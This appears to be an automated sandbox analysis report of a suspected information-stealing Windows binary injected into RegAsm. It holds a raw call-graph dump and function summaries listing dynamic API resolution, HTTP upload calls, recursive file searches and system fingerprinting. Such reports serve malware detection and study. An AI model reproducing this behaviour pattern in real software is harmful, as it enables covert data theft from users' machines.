40fe20 lstrcpy 60640->60641 60642 41642c 60641->60642 60643 401120 lstrcpy 60642->60643 60644 416444 60643->60644 61066 4153e0 60644->61066 60646 416450 60646->59089 60648 40fe60 lstrcpy 60647->60648 60649 404c39 60648->60649 60650 404430 5 API calls 60649->60650 60651 404c45 GetProcessHeap RtlAllocateHeap 60650->60651 61330 4100c0 60651->61330 60653 404c7f InternetOpenA StrCmpCA 60654 404ca0 60653->60654 60655 404e08 InternetCloseHandle 60654->60655 60656 404cae InternetConnectA 60654->60656 60664 404e1b 60655->60664 60657 404cd4 HttpOpenRequestA 60656->60657 60658 404dfe InternetCloseHandle 60656->60658 60659 404df4 InternetCloseHandle 60657->60659 60660 404d0c 60657->60660 60658->60655 60659->60658 60661 404d10 InternetSetOptionA 60660->60661 60662 404d29 HttpSendRequestA HttpQueryInfoA 60660->60662 60661->60662 60663 404d5e 60662->60663 60667 404d91 60662->60667 60663->59095 60664->59095 60665 404df1 60665->60659 60666 404db0 InternetReadFile 60666->60665 60666->60667 60667->60663 60667->60665 60667->60666 61331 406da0 60668->61331 60670 40eb8d 60673 40e97f StrCmpCA 60703 40e950 60673->60703 60678 40ea04 StrCmpCA 60678->60703 60680 40fe20 lstrcpy 60680->60703 60683 40eb2b StrCmpCA 60683->60703 60684 40ffe0 lstrlen lstrcpy lstrcat 60684->60703 60686 401120 lstrcpy 60686->60703 60689 40ff50 2 API calls 60689->60703 60693 40fe60 lstrcpy 60693->60703 60695 40ff00 lstrcpy 60695->60703 60703->60670 60703->60673 60703->60678 60703->60680 60703->60683 60703->60684 60703->60686 60703->60689 60703->60693 60703->60695 61335 40dfc0 60703->61335 61387 40e2f0 60703->61387 61500 40bb60 60703->61500 60882 40fe20 lstrcpy 60881->60882 60883 4024cb 60882->60883 60883->59843 60884->59843 60885->59843 60886->59843 60887->59843 60888->59885 60889->59898 60890->59860 60891->59883 60892->59836 60893->59859 60894->59821 60895->59835 60897 40fe20 lstrcpy 60896->60897 60898 4024fb 60897->60898 60898->59811 60899->59820 60901 410cf2 60900->60901 60902 410d04 60900->60902 60903 40fe20 lstrcpy 60901->60903 60904 40fe20 lstrcpy 60902->60904 60905 410cfd 60903->60905 60906 410d10 60904->60906 60905->59936 60906->59936 60907->59940 60909 404460 60908->60909 60909->60909 60910 404467 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 60909->60910 60925 4100c0 60910->60925 60912 4044b5 lstrlen 60926 4100c0 60912->60926 60914 4044c5 InternetCrackUrlA 60915 4044ea 60914->60915 60915->59949 60917 40fe20 lstrcpy 60916->60917 60918 411485 60917->60918 60919 40fe20 lstrcpy 60918->60919 60920 41149e GetSystemTime 60919->60920 60921 4114bd 60920->60921 60921->59964 60922->60074 60924 40fea8 60923->60924 60924->59999 60925->60912 60926->60914 60927->60084 60928->60264 60929->60266 60930->60268 60931->60270 60932->60274 60933->60276 60935 406f81 LocalAlloc 60934->60935 60936 406fbb 60934->60936 60935->60936 60937 406f92 CryptStringToBinaryA 60935->60937 60936->60126 60937->60936 60938 406fa9 LocalFree 60937->60938 60938->60126 60939->60284 60940->60292 60942 40fe20 lstrcpy 60941->60942 60943 40243b 60942->60943 60943->60310 60944->60327 60946 410c9a CharToOemA 60945->60946 60947 410c7c RegQueryValueExA 60945->60947 60946->60341 60947->60946 60950 411a04 60949->60950 60951 4119e8 K32GetModuleFileNameExA CloseHandle 60949->60951 60952 40fe20 lstrcpy 60950->60952 60951->60950 60953 411a15 60952->60953 60953->60385 61081 4101a0 GetProcessHeap HeapAlloc RegOpenKeyExA 60954->61081 60956 410f09 60957 410f10 60956->60957 60958 410f1a RegOpenKeyExA 60956->60958 60957->60406 60959 410f52 60958->60959 60960 410f3b RegQueryValueExA 60958->60960 60959->60406 60960->60959 60962 411091 60961->60962 60963 4111ae 60962->60963 60964 411099 CoSetProxyBlanket 60962->60964 60965 40fe20 lstrcpy 60963->60965 60966 4110cc 60964->60966 60967 4111c4 60965->60967 60966->60963 60968 4110d4 60966->60968 60967->60420 60968->60967 60969 411102 VariantInit 60968->60969 60970 411126 60969->60970 61084 410f70 CoCreateInstance 60970->61084 60972 411135 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 60973 40fe20 lstrcpy 60972->60973 60974 411193 VariantClear 60973->60974 60974->60420 60976 411251 60975->60976 60977 411259 CoSetProxyBlanket 60976->60977 60978 411314 60976->60978 60980 41128c 60977->60980 60979 40fe20 lstrcpy 60978->60979 60981 41132a 60979->60981 60980->60978 60982 411294 60980->60982 60981->60434 60982->60981 60983 4112be VariantInit 60982->60983 60984 4112e2 60983->60984 61090 4115f0 LocalAlloc CharToOemW 60984->61090 60986 4112eb 60987 40fe20 lstrcpy 60986->60987 60988 4112f9 VariantClear 60987->60988 60988->60434 60989->60462 60991 40fe20 lstrcpy 60990->60991 60992 410c23 60991->60992 60992->60477 60994 40fe20 lstrcpy 60993->60994 60995 4103a8 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 60994->60995 60996 4104a2 60995->60996 61001 4103e7 60995->61001 60997 4104b0 60996->60997 60998 4104a9 LocalFree 60996->60998 60997->60491 60998->60997 60999 4103f0 GetLocaleInfoA 60999->61001 61000 40ffe0 lstrlen lstrcpy lstrcat 61000->61001 61001->60996 61001->60999 61001->61000 61002 40ff00 lstrcpy 61001->61002 61002->61001 61003->60504 61005 410332 wsprintfA 61004->61005 61006 41035b 61004->61006 61005->61006 61006->60519 61008 410515 RegQueryValueExA 61007->61008 61009 41052c 61007->61009 61008->61009 61009->60537 61011 4105f2 61010->61011 61012 4105ac 61010->61012 61093 4113f0 GetProcessHeap HeapFree 61011->61093 61013 4105b0 GetLastError 61012->61013 61023 4105c3 61012->61023 61013->61012 61015 410654 61013->61015 61022 41065e 61015->61022 61094 4113f0 GetProcessHeap HeapFree 61015->61094 61016 41061b 61017 410625 wsprintfA 61016->61017 61018 41066d 61016->61018 61017->60550 61018->60550 61022->60550 61024 410648 61023->61024 61025 4105de GetLogicalProcessorInformationEx 61023->61025 61091 4113f0 GetProcessHeap HeapFree 61023->61091 61092 411410 GetProcessHeap HeapAlloc 61023->61092 61024->60550 61025->61011 61025->61013 61026->60564 61095 4113a0 61027->61095 61030 4106c0 wsprintfA 61030->60578 61033 40fe20 lstrcpy 61032->61033 61034 410728 EnumDisplayDevicesA 61033->61034 61035 4107e2 61034->61035 61038 410755 61034->61038 61035->60597 61036 40ffe0 lstrlen lstrcpy lstrcat 61036->61038 61037 40ff00 lstrcpy 61037->61038 61038->61036 61038->61037 61039 4107bd EnumDisplayDevicesA 61038->61039 61039->61035 61039->61038 61041 40fe20 lstrcpy 61040->61041 61042 410ad8 CreateToolhelp32Snapshot Process32First 61041->61042 61043 410b09 Process32Next 61042->61043 61044 410b88 CloseHandle 61042->61044 61043->61044 61047 410b1b 61043->61047 61044->60610 61045 40ffe0 lstrlen lstrcpy lstrcat 61045->61047 61046 40ff00 lstrcpy 61046->61047 61047->61045 61047->61046 61048 410b76 Process32Next 61047->61048 61048->61044 61048->61047 61050 40fe20 lstrcpy 61049->61050 61051 410832 RegOpenKeyExA 61050->61051 61052 410869 61051->61052 61063 410898 61051->61063 61053 40fe60 lstrcpy 61052->61053 61055 410877 61053->61055 61054 4108a0 RegEnumKeyExA 61056 4108ce wsprintfA RegOpenKeyExA 61054->61056 61054->61063 61055->60624 61057 410a41 61056->61057 61058 410913 RegQueryValueExA 61056->61058 61060 40fe60 lstrcpy 61057->61060 61059 410943 lstrlen 61058->61059 61058->61063 61059->61063 61061 410a59 61060->61061 61061->60624 61062 4109ac RegQueryValueExA 61062->61063 61063->61054 61063->61057 61063->61062 61064 40ffe0 lstrlen lstrcpy lstrcat 61063->61064 61065 40ff00 lstrcpy 61063->61065 61064->61063 61065->61063 61067 415412 61066->61067 61068 40ff00 lstrcpy 61067->61068 61069 41545d 61068->61069 61070 40ff00 lstrcpy 61069->61070 61071 41547b 61070->61071 61072 40ff00 lstrcpy 61071->61072 61073 415487 61072->61073 61074 40ff00 lstrcpy 61073->61074 61075 415493 61074->61075 61076 4154b3 CreateThread WaitForSingleObject 61075->61076 61077 41549b 61075->61077 61079 40fe20 lstrcpy 61076->61079 61097 413e10 61076->61097 61078 4154a0 Sleep 61077->61078 61078->61076 61078->61078 61080 4154e7 61079->61080 61080->60646 61082 4101e5 RegQueryValueExA 61081->61082 61083 4101fb 61081->61083 61082->61083 61083->60956 61085 410f97 SysAllocString 61084->61085 61086 410ffe 61084->61086 61085->61086 61088 410fa8 61085->61088 61086->60972 61087 410ffa SysFreeString 61087->61086 61088->61087 61089 410fde _wtoi64 SysFreeString 61088->61089 61089->61087 61090->60986 61091->61023 61092->61023 61093->61016 61094->61022 61096 4106aa GlobalMemoryStatusEx 61095->61096 61096->61030 61106 4100c0 61097->61106 61099 413e3f lstrlen 61103 413e5a 61099->61103 61105 413e4f 61099->61105 61100 40fe60 lstrcpy 61100->61103 61102 40ff00 lstrcpy 61102->61103 61103->61100 61103->61102 61104 413f09 StrCmpCA 61103->61104 61107 404e40 61103->61107 61104->61103 61104->61105 61106->61099 61108 40fe60 lstrcpy 61107->61108 61109 404e7e 61108->61109 61110 404430 5 API calls 61109->61110 61111 404e8a 61110->61111 61316 411720 61111->61316 61113 404eba 61114 404ec5 lstrlen 61113->61114 61115 404ed5 61114->61115 61116 411720 4 API calls 61115->61116 61117 404ee3 61116->61117 61118 40fe20 lstrcpy 61117->61118 61119 404ef3 61118->61119 61120 40fe20 lstrcpy 61119->61120 61121 404f04 61120->61121 61122 40fe20 lstrcpy 61121->61122 61123 404f15 61122->61123 61124 40fe20 lstrcpy 61123->61124 61125 404f26 61124->61125 61126 40fe20 lstrcpy 61125->61126 61127 404f37 StrCmpCA 61126->61127 61128 404f5b 61127->61128 61129 404f87 61128->61129 61132 404f76 InternetOpenA 61128->61132 61130 411450 2 API calls 61129->61130 61131 404f92 61130->61131 61133 40ff50 2 API calls 61131->61133 61132->61129 61141 4057d5 61132->61141 61143 40fe60 lstrcpy 61141->61143 61155 405714 61143->61155 61155->61103 61317 411733 CryptBinaryToStringA 61316->61317 61318 41172c 61316->61318 61319 411769 61317->61319 61320 41174e GetProcessHeap RtlAllocateHeap 61317->61320 61318->61113 61319->61113 61320->61319 61321 411771 CryptBinaryToStringA 61320->61321 61321->61113 61330->60653 61332 406dac 61331->61332 61647 406c70 61332->61647 61334 406dbf 61334->60703 61388 40fe20 lstrcpy 61387->61388 61650 406ae0 61647->61650 61649 406c98 61649->61334 61651 406af3 61650->61651 61652 406afb 61650->61652 61651->61649 61667 4065a0 61652->61667 61654 406b1b 61669 4065ac 61667->61669 61668 4065b3 61668->61654 61669->61668 61670 40660d 61669->61670 61697 411410 GetProcessHeap HeapAlloc 61670->61697 61672 406622 61672->61654 61697->61672 62619 6c82b9c0 62620 6c82b9c9 62619->62620 62621 6c82b9ce dllmain_dispatch 62619->62621 62623 6c82bef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 62620->62623 62623->62621 62624 6c82b830 62625 6c82b83b 62624->62625 62626 6c82b86e dllmain_crt_process_detach 62624->62626 62627 6c82b860 dllmain_crt_process_attach 62625->62627 62628 6c82b840 62625->62628 62626->62628 62627->62628 62629 6c82b694 62630 6c82b6a0 ___scrt_is_nonwritable_in_current_image 62629->62630 62659 6c82af2a 62630->62659 62632 6c82b6a7 62633 6c82b6d1 62632->62633 62634 6c82b796 62632->62634 62641 6c82b6ac ___scrt_is_nonwritable_in_current_image 62632->62641 62663 6c82b064 62633->62663 62676 6c82b1f7 IsProcessorFeaturePresent 62634->62676 62637 6c82b6e0 __RTC_Initialize 62637->62641 62666 6c82bf89 InitializeSListHead 62637->62666 62639 6c82b6ee ___scrt_initialize_default_local_stdio_options 62642 6c82b6f3 _initterm_e 62639->62642 62640 6c82b79d ___scrt_is_nonwritable_in_current_image 62643 6c82b7d2 62640->62643 62644 6c82b828 62640->62644 62655 6c82b7b3 ___scrt_uninitialize_crt __RTC_Initialize 62640->62655 62642->62641 62645 6c82b708 62642->62645 62680 6c82b09d _execute_onexit_table _cexit ___scrt_release_startup_lock 62643->62680 62646 6c82b1f7 ___scrt_fastfail 6 API calls 62644->62646 62667 6c82b072 62645->62667 62650 6c82b82f 62646->62650 62648 6c82b7d7 62681 6c82bf95 __std_type_info_destroy_list 62648->62681 62653 6c82b83b 62650->62653 62654 6c82b86e dllmain_crt_process_detach 62650->62654 62652 6c82b70d 62652->62641 62656 6c82b711 _initterm 62652->62656 62657 6c82b860 dllmain_crt_process_attach 62653->62657 62658 6c82b840 62653->62658 62654->62658 62656->62641 62657->62658 62660 6c82af33 62659->62660 62682 6c82b341 IsProcessorFeaturePresent 62660->62682 62662 6c82af3f ___scrt_uninitialize_crt 62662->62632 62683 6c82af8b 62663->62683 62665 6c82b06b 62665->62637 62666->62639 62668 6c82b077 ___scrt_release_startup_lock 62667->62668 62669 6c82b082 62668->62669 62670 6c82b07b 62668->62670 62673 6c82b087 _configure_narrow_argv 62669->62673 62693 6c82b341 IsProcessorFeaturePresent 62670->62693 62672 6c82b080 62672->62652 62674 6c82b092 62673->62674 62675 6c82b095 _initialize_narrow_environment 62673->62675 62674->62652 62675->62672 62677 6c82b20c ___scrt_fastfail 62676->62677 62678 6c82b218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 62677->62678 62679 6c82b302 ___scrt_fastfail 62678->62679 62679->62640 62680->62648 62681->62655 62682->62662 62684 6c82af9a 62683->62684 62685 6c82af9e 62683->62685 62684->62665 62686 6c82b028 62685->62686 62688 6c82afab ___scrt_release_startup_lock 62685->62688 62687 6c82b1f7 ___scrt_fastfail 6 API calls 62686->62687 62689 6c82b02f 62687->62689 62690 6c82afb8 _initialize_onexit_table 62688->62690 62691 6c82afd6 62688->62691 62690->62691 62692 6c82afc7 _initialize_onexit_table 62690->62692 62691->62665 62692->62691 62693->62672 62694 6c82b8ae 62697 6c82b8ba ___scrt_is_nonwritable_in_current_image 62694->62697 62695 6c82b8c9 62696 6c82b8e3 dllmain_raw 62696->62695 62699 6c82b8fd dllmain_crt_dispatch 62696->62699 62697->62695 62697->62696 62698 6c82b8de 62697->62698 62707 6c80bed0 DisableThreadLibraryCalls LoadLibraryExW 62698->62707 62699->62695 62699->62698 62701 6c82b91e 62703 6c82b94a 62701->62703 62708 6c80bed0 DisableThreadLibraryCalls LoadLibraryExW 62701->62708 62702 6c82b953 dllmain_crt_dispatch 62702->62695 62704 6c82b966 dllmain_raw 62702->62704 62703->62695 62703->62702 62704->62695 62706 6c82b936 dllmain_crt_dispatch dllmain_raw 62706->62703 62707->62701 62708->62706 62709 6c7f3060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 62714 6c82ab2a 62709->62714 62713 6c7f30db 62718 6c82ae0c _crt_atexit _register_onexit_function 62714->62718 62716 6c7f30cd 62717 6c82b320 5 API calls ___raise_securityfailure 62716->62717 62717->62713 62718->62716 62719 6c7f35a0 62720 6c7f35c4 InitializeCriticalSectionAndSpinCount getenv 62719->62720 62735 6c7f3846 __aulldiv 62719->62735 62721 6c7f38fc strcmp 62720->62721 62734 6c7f35f3 __aulldiv 62720->62734 62725 6c7f3912 strcmp 62721->62725 62721->62734 62723 6c7f35f8 QueryPerformanceFrequency 62723->62734 62724 6c7f38f4 62725->62734 62726 6c7f3622 _strnicmp 62727 6c7f3944 _strnicmp 62726->62727 62726->62734 62730 6c7f395d 62727->62730 62727->62734 62728 6c7f376a QueryPerformanceCounter EnterCriticalSection 62729 6c7f37b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 62728->62729 62732 6c7f375c 62728->62732 62729->62732 62733 6c7f37fc LeaveCriticalSection 62729->62733 62731 6c7f3664 GetSystemTimeAdjustment 62731->62734 62732->62728 62732->62729 62732->62733 62732->62735 62733->62732 62733->62735 62734->62723 62734->62726 62734->62727 62734->62730 62734->62731 62734->62732 62736 6c82b320 5 API calls ___raise_securityfailure 62735->62736 62736->62724

                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                  Function 004185A0 Relevance: 63.2, APIs: 34, Strings: 2, Instructions: 208libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 559 4185a0-4185b2 LoadLibraryA 560 4187c7-418826 LoadLibraryA * 5 559->560 561 4185b8-4187c2 GetProcAddress * 21 559->561 562 418828-418836 GetProcAddress 560->562 563 41883b-418842 560->563 561->560 562->563 565 418844-41886a GetProcAddress * 2 563->565 566 41886f-418876 563->566 565->566 567 418878-418886 GetProcAddress 566->567 568 41888b-418892 566->568 567->568 569 418894-4188a2 GetProcAddress 568->569 570 4188a7-4188ae 568->570 569->570 571 4188b0-4188d5 GetProcAddress * 2 570->571 572 4188da 570->572 571->572
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,004184AA), ref: 004185A5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,0155F258), ref: 004185C0
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F1C8), ref: 004185ED
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F2E8), ref: 00418606
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F3C0), ref: 0041861E
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F3A8), ref: 00418636
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01562EB0), ref: 0041864F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,015625C0), ref: 00418667
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01562800), ref: 0041867F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F360), ref: 00418698
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F300), ref: 004186B0
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F438), ref: 004186C8
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F240), ref: 004186E1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,015627E0), ref: 004186F9
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F3F0), ref: 00418711
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F318), ref: 0041872A
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01562640), ref: 00418742
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F330), ref: 0041875A
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F348), ref: 00418773
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01562680), ref: 0041878B
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155CA58), ref: 004187A3
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01562600), ref: 004187BC
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(0156DCD8), ref: 004187CD
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(0156DD50), ref: 004187DF
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(0156DB10), ref: 004187F1
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(0156DAC8), ref: 00418802
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(0156DB88), ref: 00418814
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,0156DBB8), ref: 00418830
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75290000,0156DC18), ref: 0041884C
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75290000,0156DC30), ref: 00418864
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,0156DC60), ref: 00418880
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75450000,01562660), ref: 0041889C
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(76E90000,01562EC0), ref: 004188B8
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 004188CF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                  • String ID: NtQueryInformationProcess$kernel32.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 2238633743-258108907
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7266dee1e8cedc60a2977318b2278b4377f0c83288a22ad4706934660cf6d17d
                                                                                                                                                                                                                                                                                                  • Instruction ID: bda799d21cc2b01bfb12709a94fee26cd9c3543f1087e7d92f23403565ae61c8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7266dee1e8cedc60a2977318b2278b4377f0c83288a22ad4706934660cf6d17d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 199144BDA00620EFE754DFA4ED48A2637BBF74AB01B146529EA05C7374E774A841CB60
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 004164A0 Relevance: 49.3, APIs: 23, Strings: 5, Instructions: 322stringfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1377 4164a0-416526 call 4194d0 wsprintfA FindFirstFileA memset * 2 1380 416540-416546 1377->1380 1381 416528-41653b call 40fea0 1377->1381 1382 416550-416564 StrCmpCA 1380->1382 1387 41689d-4168c4 call 40fea0 * 2 1381->1387 1384 416867-41687a FindNextFileA 1382->1384 1385 41656a-41657e StrCmpCA 1382->1385 1384->1382 1389 416880-416899 FindClose call 40fea0 1384->1389 1385->1384 1388 416584-4165b5 wsprintfA StrCmpCA 1385->1388 1390 4165e0-4165fd wsprintfA 1388->1390 1391 4165b7-4165de wsprintfA 1388->1391 1389->1387 1394 416600-416640 memset lstrcat strtok_s 1390->1394 1391->1394 1397 416642-416653 1394->1397 1398 41666f-4166ac memset lstrcat strtok_s 1394->1398 1400 416801-416809 1397->1400 1407 416659-41666d strtok_s 1397->1407 1398->1400 1401 4166b2-4166c2 PathMatchSpecA 1398->1401 1400->1384 1404 41680b-416819 1400->1404 1405 416754-416768 strtok_s 1401->1405 1406 4166c8-416752 call 411450 wsprintfA call 40fea0 call 4118d0 call 419670 1401->1406 1404->1389 1409 41681b-416823 1404->1409 1405->1401 1408 41676e 1405->1408 1406->1405 1425 416773-41677e 1406->1425 1407->1397 1407->1398 1408->1400 1409->1384 1411 416825-41685c call 401120 call 4164a0 1409->1411 1418 416861 1411->1418 1418->1384 1426 4168c5-4168d8 call 40fea0 1425->1426 1427 416784-4167aa call 40fe20 call 406e80 1425->1427 1426->1387 1434 4167f4-4167fa 1427->1434 1435 4167ac-4167ef call 40fe20 call 401120 call 4153e0 call 40fea0 1427->1435 1434->1400 1435->1434
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memset$strtok_swsprintf$lstrcat$FileFindFirstMatchPathSpec
                                                                                                                                                                                                                                                                                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                                                                                                                  • API String ID: 1425701045-3225784412
                                                                                                                                                                                                                                                                                                  • Opcode ID: f9a939fed25fb007d3cd6773e4f62d57578648204a3180eca1f04e510bea48cb
                                                                                                                                                                                                                                                                                                  • Instruction ID: 90e794690816a6f02978cdac63616847133c7af68286edecf0343b1f7787fe60
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9a939fed25fb007d3cd6773e4f62d57578648204a3180eca1f04e510bea48cb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78C1FDB5900218ABDF10DFA4DC85EEE7779EF48704F10455EF515A3281E738AE88CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040D320 Relevance: 46.4, APIs: 18, Strings: 8, Instructions: 907fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
